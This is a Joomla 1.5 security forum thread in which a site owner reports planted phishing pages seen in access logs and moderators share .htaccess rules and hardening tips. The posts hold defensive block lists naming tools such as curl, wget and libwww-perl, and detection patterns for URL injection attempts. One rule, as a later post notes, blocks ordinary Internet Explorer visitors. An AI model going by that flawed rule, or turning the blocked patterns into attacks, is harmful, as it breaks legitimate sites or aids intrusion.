If I patch my Joomla...

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
User avatar
juanpablo321
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Fri Nov 10, 2006 2:52 am
Location: Colombia

If I patch my Joomla...

Postby juanpablo321 » Thu Jan 29, 2009 4:13 am

Hi.
I know the key is in keeping my Joomla updated. But now I have a serious problem. I have a lot of exploits on my site like this:
84.158.161.7 - - [27/Jan/2009:08:53:37 -0500] "GET /media/secure/www.halifax-online.co.uk/_mem_/formslogin.asp HTTP/1.1" 404 524 "-" "Mozilla/666.6 libwww-perl/5.814"

I am patching my sites but I want to know if this will remove the exploits. If not, how can I remove them?

Thank you!
God Bless whom created the forum!

PatSch001
Joomla! Apprentice
Joomla! Apprentice
Posts: 8
Joined: Fri Jan 09, 2009 9:21 am

Re: If I patch my Joomla...

Postby PatSch001 » Thu Jan 29, 2009 8:21 am

Note, these are attempted exploits on your site, (the 404 status shows they were not successful) :)

Make sure you have gone through the Security Checklist (http://docs.joomla.org/Joomla!_Administrators_Security_Checklist

The default htaccess included with Joomla has some rules to block this otherwise search this forum for 'libwww-perl' and you'll get a pile of information.

Regards
Patrick

User avatar
juanpablo321
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Fri Nov 10, 2006 2:52 am
Location: Colombia

Re: If I patch my Joomla...

Postby juanpablo321 » Thu Jan 29, 2009 11:05 pm

PatSch001 wrote:...The default htaccess included with Joomla has some rules to block this otherwise search this forum for 'libwww-perl' and you'll get a pile of information.

Regards
Patrick


Thank you for your information Patrick.

We have solved the problem looking for the ip address associated with the exploit. Finally we find their position and proceed to remove them.
Here is one of them:
/var/www/vhosts/mycustomerdomain.com/statistics/logs/access_log:(the-fuc#%_ip-address)128.232.110.18 - - [28/Jan/2009:06:06:38 -0500] "GET /components/secure/www.halifax-online.co.uk/_mem_/formslogin.asp/ HTTP/1.1" 200 27058 "-" "Mozilla/4.0 (compatible MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

We remove all the files in the /tmp folder too and disable the Perl Service. We don't use them.

The warning of suspend my service because "being dangerous for other hosts", form the hosting provider, has been removed.

Lesson:
1. Keep our Joomla installations updated... http://www.joomla.org/download.html
2. Keep the extensions updated too.
3. Check frequently the access_log.processed file of my sites for suspicious access.
4. Backup my sites frequently.

Code: Select all

zgrep "?*=http://" /var/www/vhosts/*/statistics/logs/access_log*| awk '/Jan/ && /libww/ && $9 !~/^4/'
Last edited by juanpablo321 on Fri Jan 30, 2009 1:40 pm, edited 1 time in total.
God Bless whom created the forum!

User avatar
brad
Joomla! Master
Joomla! Master
Posts: 13414
Joined: Fri Aug 12, 2005 12:38 am
Location: Sydney - Australia
Contact:

Re: If I patch my Joomla...

Postby brad » Fri Jan 30, 2009 1:01 am

What version of Joomla are you running?
Brad Baker
http://www.rochen.com - Joomla! Hosting, the correct way.
https://www.joomlatutorials.com <-- Joomla Help & Tutorials

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13636
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: If I patch my Joomla...

Postby mandville » Fri Jan 30, 2009 1:31 am

apart from running the joomla forum assistant

and this was blatantly stolen from a google search
http://www.askapache.com/htaccess/block ... ccess.html

add to your htaccess file , make sure your folders have the correct permissions

ErrorDocument 403 /403.html

RewriteEngine On
RewriteBase /

# IF THE UA STARTS WITH THESE
RewriteCond %{HTTP_USER_AGENT} ^(aesop_com_spiderman|alexibot|backweb|bandit|batchftp|bigfoot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(black.?hole|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cheesebot|cherrypicker|chinaclaw|collector|copier|copyrightcheck) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(cosmos|crescent|curl|custo|da|diibot|disco|dittospyder|dragonfly) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(drip|easydl|ebingbong|ecatch|eirgrabber|emailcollector|emailsiphon) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(emailwolf|erocrawler|exabot|eyenetie|filehound|flashget|flunky) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(frontpage|getright|getweb|go.?zilla|go-ahead-got-it|gotit|grabnet) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(grafula|harvest|hloader|hmview|httplib|httrack|humanlinks|ilsebot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(infonavirobot|infotekies|intelliseek|interget|iria|jennybot|jetcar) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(joc|justview|jyxobot|kenjin|keyword|larbin|leechftp|lexibot|lftp|libweb) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(likse|linkscan|linkwalker|lnspiderguy|lwp|magnet|mag-net|markwatch) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mata.?hari|memo|microsoft.?url|midown.?tool|miixpc|mirror|missigua) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(mister.?pix|moget|mozilla.?newt|nameprotect|navroad|backdoorbot|nearsite) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(net.?vampire|netants|netcraft|netmechanic|netspider|nextgensearchbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(attach|nicerspro|nimblecrawler|npbot|octopus|offline.?explorer) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(offline.?navigator|openfind|outfoxbot|pagegrabber|papa|pavuk) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(pcbrowser|php.?version.?tracker|pockey|propowerbot|prowebwalker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(psbot|pump|queryn|recorder|realdownload|reaper|reget|true_robot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(repomonkey|rma|internetseer|sitesnagger|siphon|slysearch|smartdownload) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(snake|snapbot|snoopy|sogou|spacebison|spankbot|spanner|sqworm|superbot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(superhttp|surfbot|asterias|suzuran|szukacz|takeout|teleport) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(telesoft|the.?intraformant|thenomad|tighttwatbot|titan|urldispatcher) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(turingos|turnitinbot|urly.?warning|vacuum|vci|voideye|whacker) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(libwww-perl|widow|wisenutbot|wwwoffle|xaldon|xenu|zeus|zyborg|anonymouse) [NC,OR]

# STARTS WITH WEB
RewriteCond %{HTTP_USER_AGENT} ^web(zip|emaile|enhancer|fetch|go.?is|auto|bandit|clip|copier|master|reaper|sauger|site.?quester|whack) [NC,OR]

# ANYWHERE IN UA -- GREEDY REGEX
RewriteCond %{HTTP_USER_AGENT} ^.*(craftbot|download|extract|stripper|sucker|ninja|clshttp|webspider|leacher|collector|grabber|webpictures).*$ [NC]

# ISSUE 403 / SERVE ERRORDOCUMENT
RewriteRule . - [F,L]


and perhaps inform the sourcing IP that put the POST command
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
juanpablo321
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Fri Nov 10, 2006 2:52 am
Location: Colombia

Re: If I patch my Joomla...

Postby juanpablo321 » Fri Jan 30, 2009 1:36 pm

brad wrote:What version of Joomla are you running?

I have a (dv) server and I have hosted around 80 sites there, the most with Joomla.
The sites where attack was using different Joomla versions; all of them with some thing in common: Out of date. I know what are you thinking. I'll keep them updated now.
Thanks for your usable posts.
God Bless whom created the forum!

User avatar
juanpablo321
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Fri Nov 10, 2006 2:52 am
Location: Colombia

Re: If I patch my Joomla...

Postby juanpablo321 » Fri Jan 30, 2009 2:00 pm

mandville wrote:apart from running the joomla forum assistant

and this was blatantly stolen from a google search
http://www.askapache.com/htaccess/block ... ccess.html

add to your htaccess file , make sure your folders have the correct permissions

ErrorDocument 403 /403.html....

---
...and perhaps inform the sourcing IP that put the POST command


Do I have to add this code in my .htaccess file? Is it safe? Could I add it in all my sites although they use different Joomla Versions?
:pop
God Bless whom created the forum!

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13636
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: If I patch my Joomla...

Postby mandville » Fri Jan 30, 2009 6:32 pm

Yes, it is safe (depends on your server configuration to its effectiveness though!)

here is a sample to show how its used on several j1.5.9 installs i have
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

RewriteEngine On

SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "^ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "^CherryPicker" bad_bot
SetEnvIfNoCase User-Agent "^NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "^Teleport" bad_bot
SetEnvIfNoCase User-Agent "^EmailCollector" bad_bot
SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
SetEnvIfNoCase User-Agent "^Zeus" bad_bot
SetEnvIfNoCase User-Agent "^Libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^DataCha0s/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Wget/1.1" bad_bot
SetEnvIfNoCase User-Agent "^StackRambler/2.0" bad_bot
SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>


HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
juanpablo321
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Fri Nov 10, 2006 2:52 am
Location: Colombia

Re: If I patch my Joomla...

Postby juanpablo321 » Mon Feb 02, 2009 6:58 am

Thank you mandville
God Bless whom created the forum!

SpellenArena
Joomla! Intern
Joomla! Intern
Posts: 63
Joined: Fri Mar 09, 2007 3:29 pm

Re: If I patch my Joomla...

Postby SpellenArena » Fri May 28, 2010 3:35 am

In joomla 1.5.17 there's also the following in the .htaccess file:

## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files

Can i use these with the above example from mandville?

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13636
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: If I patch my Joomla...

Postby mandville » Sat May 29, 2010 12:37 am

i would use the newest version of the htaccess file with any modifications you wish for your server settings but mainly the bad_bot list
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13636
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: If I patch my Joomla...

Postby mandville » Tue Jun 08, 2010 10:15 am

caution - found that the line

Code: Select all

SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

MAY block most versions of IE!
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
fw116
Joomla! Ace
Joomla! Ace
Posts: 1365
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Re: If I patch my Joomla...

Postby fw116 » Tue Jun 08, 2010 3:48 pm

mandville wrote:caution - found that the line

Code: Select all

SetEnvIfNoCase User-Agent "^Mozilla/4.0" bad_bot

MAY block most versions of IE!


yeah heaven :D :p

Jack_Sparow
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Thu Jun 03, 2010 5:00 pm
Contact:

Re: If I patch my Joomla...

Postby Jack_Sparow » Mon Feb 21, 2011 5:23 pm

Thanks for this 1. :D

bruce99
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 129
Joined: Fri Feb 11, 2011 4:59 am
Location: Melbourne Australia
Contact:

Re: If I patch my Joomla...

Postby bruce99 » Tue Feb 22, 2011 2:52 am

Hi all,

I have a joomla site about a year or so old, but have just created one from the latest version from crazy domains in Aust. The reason that I chose joomla again was that the templates are a great idea, mostly its free and I thought it was fairly safe.

Security is never really mentioined a great deal when you first select joomla. Are the attacks targetted, is it a pretty easy app to penetrate and what damage can be done? Originally I thought that my virus protection would stop issues for me, but of course thats for programs on my PC not the host where my site is held.

Like many people who use joomla I am not a coder and hacking code is always fraught with risk when you are completely reliant on forum advice. Does anyone really know how vulnerable joomla is, are there any quick fixes (for a novice) and do you suggest an easy to use back up program incase things go wrong - plus WILL the backup restore the whole site including links and articles or what? -
I am a dog walker and have two dog information sites: dogwalkersmelbourne.com.au & a dog treat site, Thank you.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2727
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: If I patch my Joomla...

Postby PhilD » Tue Feb 22, 2011 2:07 pm

@bruce99
While nothing exposed to the web is 100% safe, you don't have to hack anything to be safe with Joomla. The current version of Joomla 1.5.22 is secure with no known security issues. Joomla is no more vulnerable to attack than any other CMS program. In fact it may be more secuer as a main focus of the developers is security while maintaining ease of use. Not an easy task I might say.

I would not attempt applying the code from the above posts. This is especially true since your not comfortable with attempting any of it. In fact I would not recomend applying any code, core hack, or modification your not comfortable with. This is especially true with code examples found in the forums.

There are some modifications you can do to increase security that can be found in the official documentation. These modifications have been tested on many servers and generally work as advertized. Again, if your not comfortable performing modifications at this point, then don't do them. Joomla is secure enough in the default install to not need any modification (except for enabling the htaccess file - see below)

Some tips

do use a modern quality hosting service. Preferbly one that uses mod_security, php 5, suexec. You mostly get what you pay for. (what do you expect for free or nearly free? Fort Knox from someone who cares about security?) Be aware of some really popular heavily advertised hosting services also. They seem to have a larger than average share of issues with their servers being hacked.

Don't use an offer by the hosting company (your domains control panel one click install). Many of these services are not on the latest version, are slow to offer security updates, and can make it rather hard sometimes to know just where Joomla was installed. The install scripts used by these services may also force insecure file/directory permissions which you won't know about until it's to late.

do always keep files at 644 (or tighter) permissions and directories at 755 (or tighter) permissions. 644/755 are normal server defaults and are reasonably safe.

Do install the latest Joomla version. By controlling your own installation directly, you can easily apply updates or security patched to the Joomla core files.

do enable the htaccess.txt file by renaming the file to .htaccess You can do this using an ftp program. this file contains some code to stop some exploits and should always be enabled.

do keep all 3rd party extensions updated. This is most important as most issues with hacked websites arise from the use of outdated or insecure 3rd party extensions.

do use good strong passwords. 12 characters long for a super admin is normally long enough.

do consider changing the super admin password on a regular basis.

do use a password manager such as KeePass for all your passwords.

do create a new super admin account and change using the new super admin account after successful admin login then delete the old one

do keep your computers anti-virus updated and also run additional checks such as malwarebytes on a regular basis. Reason for this is that even good trusted sites may become infected with malware that will silently download malware to your computer for the only purpose of finding and stealing passwords. ftp programs are frequently targeted. once the user name and password are stolen it is easy to log in to your site and cause problems.

Make backups of both the database and the files found in your public_html directory on a regular basis. database is where your date is stored and the public_html directory is where the files and templates that use this data to assemble the pages resides.

do read and learn more about security from our extensive doc files. Even if you ultimately decide not to use Joomla, most of the information applies to your domain in general.

http://docs.joomla.org/Category:Security_Checklist

http://docs.joomla.org/Security_Checklist_7

http://docs.joomla.org/Vulnerable_Extensions_List

If you do these things, there is no need to hack, program, sort through htaccess rules.

Articles, links, categories, sections etc are all stored in the database. photos, images, files for download are normally stored in public_html in the appropriate directory
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

bruce99
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 129
Joined: Fri Feb 11, 2011 4:59 am
Location: Melbourne Australia
Contact:

Re: If I patch my Joomla...

Postby bruce99 » Tue Feb 22, 2011 11:34 pm

Hi Phil D,

An excellent answer. I did use the one click install, but my host seems good. I have the latest version joomla. I already re named the htaccess for enabling seo in the urls.

I guess most development will now be pushed to joomla 1.6, but I went with 1.5 for an established stability and number of extensions available.

Do you have a recommendation for a good back up in the extensions library? As long as it does the job simply and their is some documentation I will be there.

I really appreciate the active experienced users answering questions in this forum ... as while working on my site without tech skills has been daunting, I have mostly resolved the major issues. Mostly its about how to display the data such as trying to get a good article display page, like latest news ... but sometimes you have to let the little questions go just to get sites up. Will keep plugging away. Thanks again! B
I am a dog walker and have two dog information sites: dogwalkersmelbourne.com.au & a dog treat site, Thank you.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13636
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: If I patch my Joomla...

Postby mandville » Tue Feb 22, 2011 11:51 pm

i suggest that you check the permissions on the files and folders, using akeeba admin tools is a good easy way of doing it
http://extensions.joomla.org/extensions ... tion/14087
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}


Return to “Security in Joomla! 1.5”

Who is online

Users browsing this forum: No registered users and 13 guests